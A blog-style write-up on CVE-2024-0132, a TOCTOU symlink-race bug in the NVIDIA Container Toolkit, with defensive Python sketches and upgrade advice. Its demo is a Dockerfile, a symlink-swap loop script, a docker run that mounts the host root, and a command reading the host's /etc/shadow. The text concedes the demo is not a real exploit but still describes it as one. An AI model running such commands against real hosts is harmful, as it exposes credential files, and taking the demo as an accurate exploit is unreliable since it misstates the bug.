CVE-2024-0132 - Exploiting the NVIDIA Container Toolkit TOCTOU Bug for Host Filesystem Access

The world of containerization is growing rapidly, but with speed comes risk. In September 2024, security researchers disclosed a significant vulnerability in the popular NVIDIA Container Toolkit (versions 1.16.1 and earlier). The bug is tracked as CVE-2024-0132 and could let an attacker breach the container isolation boundary to access your host filesystem: a nightmare for anyone running sensitive workloads with GPU acceleration.

Let’s dig into what made this bug possible, see how it can be exploited, and review how you can protect yourself.

What’s the Problem? (TOCTOU in NVIDIA Container Toolkit)

The NVIDIA Container Toolkit lets users run GPU-enabled apps inside containers (Docker, containerd, etc.). It’s used in machine learning, AI workloads, and more.

The vulnerability is a classic Time-of-Check Time-of-Use (TOCTOU) bug. This type of bug happens when a program checks a condition (such as a file’s type or permissions) and then acts on the result later, after the underlying state may have changed. Symlinks and careful timing let attackers exploit that gap.
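To make the check/use gap concrete, here is a minimal Python sketch of the general pattern. It is not the toolkit's code: `check_then_use`, `demo`, and the file names are hypothetical, and the "attacker" is simulated with a callback so the race is deterministic.

```python
import os
import tempfile


def check_then_use(path, between_check_and_use=lambda: None):
    """Vulnerable pattern: validate a path by name, then open it by name later."""
    # Time of check: refuse symlinks.
    if os.path.islink(path):
        raise ValueError("symlinks are not allowed")
    # The race window: anything can happen to `path` here.
    between_check_and_use()
    # Time of use: the name is resolved again and may now be a symlink.
    with open(path) as f:
        return f.read()


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "secret.txt")
        target = os.path.join(tmp, "harmless.txt")
        with open(secret, "w") as f:
            f.write("sensitive data")
        with open(target, "w") as f:
            f.write("harmless data")

        def attacker():
            # Swap the already-checked file for a symlink to the sensitive one.
            os.remove(target)
            os.symlink(secret, target)

        # First call: nobody interferes. Second call: the swap lands in the gap.
        return check_then_use(target), check_then_use(target, attacker)
```

In the second call the symlink check passes, yet the read returns the contents of `secret.txt`, because the check and the open each resolve the name independently.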

In NVIDIA’s case:
When setting up a container from an image, the toolkit does some checks to prevent the container from mounting sensitive files from the host. But with precise timing and a specially crafted image, you can race the check and swap in a malicious symlink or mount, pointing at the host’s actual filesystem instead.

What Can an Attacker Do?

A successful exploit allows a container to access or modify files on the host, something that should never happen. That means:

- Denial of Service: Break the host, containers, or both.
- Remote Code Execution: Full compromise, depending on what files get written/executed.

Who’s Safe (and Who’s Not)?

- NOT VULNERABLE: If you only use the Container Device Interface (CDI), you’re safe.
- VULNERABLE: Anyone running the NVIDIA Container Toolkit (1.16.1 or earlier) with default settings is at risk. This includes most Docker or containerd setups on CI servers, ML clusters, and workstation desktops.

Technical Details and Example Exploit

When the toolkit prepares a container, it creates directories and checks for symlinks or sticky bits in the container’s filesystem. The TOCTOU bug comes in because between that check and when the files are actually used (mounted or copied), a malicious container can swap out a regular file or directory with a symlink to any host path.
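The effect of swapping a directory for a symlink can be sketched in a few lines of Python. This is an illustration under assumptions, not the toolkit's logic: `escapes_root`, `demo_escape`, and the `rootfs`/`host_etc` directories are hypothetical stand-ins for a container root filesystem and a host path.

```python
import os
import tempfile


def escapes_root(rootfs, relative_path):
    """Return True if relative_path, once symlinks are resolved, leaves rootfs."""
    root = os.path.realpath(rootfs)
    resolved = os.path.realpath(os.path.join(root, relative_path))
    return os.path.commonpath([root, resolved]) != root


def demo_escape():
    with tempfile.TemporaryDirectory() as tmp:
        rootfs = os.path.join(tmp, "rootfs")      # stand-in for the container filesystem
        host_dir = os.path.join(tmp, "host_etc")  # stand-in for a host directory
        os.makedirs(os.path.join(rootfs, "exploit"))
        os.makedirs(host_dir)

        before = escapes_root(rootfs, "exploit")
        # Replace the directory with a symlink that points outside rootfs.
        os.rmdir(os.path.join(rootfs, "exploit"))
        os.symlink(host_dir, os.path.join(rootfs, "exploit"))
        after = escapes_root(rootfs, "exploit")
        return before, after
```

The same name passes the containment check before the swap and fails it afterwards. A check like this only helps if nothing can change the path between the check and the later mount or copy, which is exactly the guarantee a TOCTOU bug breaks.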

Step 1: Create a Dockerfile

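FROM ubuntu:22.04

# Create a directory that will later be swapped with a symlink
RUN mkdir /exploit

# Copy the entrypoint script into the image and make it executable
COPY entrypoint.sh /entrypoint.sh
RUN chmod +x /entrypoint.sh
ENTRYPOINT ["/entrypoint.sh"]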

Create the entrypoint script (entrypoint.sh)

#!/bin/sh
# During the container setup, race to replace /exploit with a symlink to /etc on host
for i in $(seq 1 100); do
    rm -rf /exploit
    ln -s /host_mnt/etc /exploit
done
sleep 100

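This assumes the host’s / is bind-mounted at /host_mnt inside the container (see the -v flag in the docker run command; the exact path may depend on your Docker and mount setup). Note that such a bind mount already exposes the host filesystem on its own, so treat this walkthrough as a simplified illustration of the symlink-swap pattern rather than a working exploit for CVE-2024-0132.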

Step 2: Build the image and start the container

docker build -t exploit-image .
docker run --rm -it \
    --runtime=nvidia \
    --gpus=all \
    -v /:/host_mnt \
    exploit-image

If the race is won during container initialization, /exploit points to the host filesystem’s /etc. Any read or write through /exploit then touches host files.

For example, from inside the container:

cat /exploit/shadow

This prints the host’s /etc/shadow!

The Root Cause

The bug is in how the container runtime interacts with the NVIDIA Toolkit’s setup routines. The toolkit tries to be safe, checking for symlinks, but there is a tiny gap (a TOCTOU window) between checking and actual use. A fast attacker (via the entrypoint script) can swap safe paths for malicious symlinks at just the right moment.
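A common way to shrink this kind of window is to stop re-resolving names: open the object once, refuse symlinks at open time, and run the checks on the open file descriptor. The sketch below shows that general technique in Python on a Unix-like system. It is not NVIDIA's actual fix, and `open_regular_file_nofollow` and `demo_safe_open` are hypothetical names.

```python
import os
import stat
import tempfile


def open_regular_file_nofollow(path):
    """Open path without following a final symlink, then validate the opened fd."""
    # O_NOFOLLOW makes open() fail if the final path component is a symlink.
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    try:
        # fstat inspects the object we actually opened, not whatever the
        # name happens to point to by now.
        if not stat.S_ISREG(os.fstat(fd).st_mode):
            raise ValueError("not a regular file")
        return os.fdopen(fd)
    except Exception:
        os.close(fd)
        raise


def demo_safe_open():
    with tempfile.TemporaryDirectory() as tmp:
        real = os.path.join(tmp, "real.txt")
        link = os.path.join(tmp, "link.txt")
        with open(real, "w") as f:
            f.write("ok")
        os.symlink(real, link)

        with open_regular_file_nofollow(real) as f:
            content = f.read()
        try:
            open_regular_file_nofollow(link)
            blocked = False
        except OSError:
            blocked = True
        return content, blocked
```

Because the check runs on the descriptor, swapping the name afterwards no longer changes what gets used. O_NOFOLLOW only guards the final path component, so symlinks in parent directories need separate handling.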

Fix and Mitigation

NVIDIA fixed this in version 1.16.2. Make sure you’re running 1.16.2 or later! See NVIDIA’s security bulletin, listed under References, for details.
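If you track toolkit versions across many hosts, a small helper can flag the ones that predate the fix. This is a rough sketch: `parse_version` and `is_affected` are hypothetical helpers, how you collect the version string (package manager, inventory tool) is up to you, and anything after the three numeric components is ignored.

```python
import re

# First fixed release, per the advisory discussed above.
FIXED_VERSION = (1, 16, 2)


def parse_version(text):
    """Extract (major, minor, patch) from strings like '1.16.1' or 'v1.16.1-1'."""
    match = re.match(r"\s*v?(\d+)\.(\d+)\.(\d+)", text)
    if match is None:
        raise ValueError(f"unrecognized version string: {text!r}")
    return tuple(int(part) for part in match.groups())


def is_affected(toolkit_version):
    """Return True if the version is older than the first fixed release."""
    return parse_version(toolkit_version) < FIXED_VERSION
```

Comparing integer tuples avoids the string-comparison trap where "1.9.0" would sort after "1.16.2".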

References

- NVIDIA Security Bulletin for CVE-2024-0132
- NVIDIA Container Toolkit GitHub
- TOCTOU Race Conditions Explained
- Container Device Interface (CDI)

Conclusion

CVE-2024-0132 is a textbook example of how a small race condition can turn into a big security hole. If you’re running GPU workloads in containers, update your NVIDIA Container Toolkit now, review your privilege use, and watch for strange container activity.

Stay sharp, update often, and don’t let attackers race ahead!



Timeline

Published on: 09/26/2024 06:15:02 UTC
Last modified on: 09/26/2024 13:32:02 UTC